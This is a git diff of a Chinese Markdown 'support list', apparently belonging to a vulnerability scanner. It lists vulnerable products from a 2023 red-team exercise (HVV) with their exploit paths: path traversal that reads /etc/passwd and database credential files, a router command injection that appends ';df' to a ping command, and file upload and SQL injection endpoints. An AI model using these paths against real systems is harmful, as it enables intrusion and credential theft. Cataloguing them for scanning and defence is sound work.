update 飞企互联 恒生

--- a/支持清单.md
+++ b/支持清单.md
@@ -1,3 +1,25 @@
+### 2023HVV
+```
+信息泄露
+- 飞企互联FE业务协作平台 /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print
+- MilesightVPN        /../etc/passwd
+- 企业微信             /cgi-bin/gateway/agentinfo
+- 金盘微信管理平台      /admin/weichatcfg/getsysteminfo
+- 锐捷交换机WEB管理系统 /EXCU_SHELL
+命令执行 
+- Cellular-Router           /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;df&v=0.1303033443137912
+- 新开普前置服务管理平台  /service_transport/service.action
+- 企望制造ERP系统        /mainFunctions/comboxstore.action
+文件上传
+- 恒生JRESCLOUD           /acm/api/v1/../../see/view/uploadImage.json
+- PigCMS                  /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
+- 易思无人值守智能物流系统  /Sys_ReportFile/ImportReport?encode=
+SQL注入
+- 红帆ioffice     /iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch
+- 广联达Linkworks /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
+- 中远麒麟堡垒机   /admin.php?controller=admin_commonuser
+```
+
 ### 支持清单
 ```
 - 亿赛通-电子文档安全管理系统 文件上传 2023 /CDGServer3/UploadFileFromClientServiceForClient?
@@ -68,24 +90,4 @@
 
 - 金蝶云星空 命令执行 2023 /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc
 - 金蝶云星空 文件读取 2023 /CommonFileServer/c%3A%2Fwindows%2Fwin.ini
-```
-
-### 2023HVV
-```
-信息泄露
-- MilesightVPN        /../etc/passwd
-- 企业微信             /cgi-bin/gateway/agentinfo
-- 金盘微信管理平台      /admin/weichatcfg/getsysteminfo
-- 锐捷交换机WEB管理系统 /EXCU_SHELL
-命令执行
-- hytec-Inter           /cgi-bin/popen.cgi?command=ping%20-c%204%201.1.1.1;df&v=0.1303033443137912
-- 新开普前置服务管理平台  /service_transport/service.action
-- 企望制造ERP系统        /mainFunctions/comboxstore.action
-文件上传
-- PigCMS                /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
-- 易思无人值守智能物流系统  /Sys_ReportFile/ImportReport?encode=
-SQL注入
-- 红帆ioffice     /iOffice/prg/set/wss/udfmr.asmx?op=GetEmpSearch
-- 广联达Linkworks /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
-- 中远麒麟堡垒机   /admin.php?controller=admin_commonuser
 ```
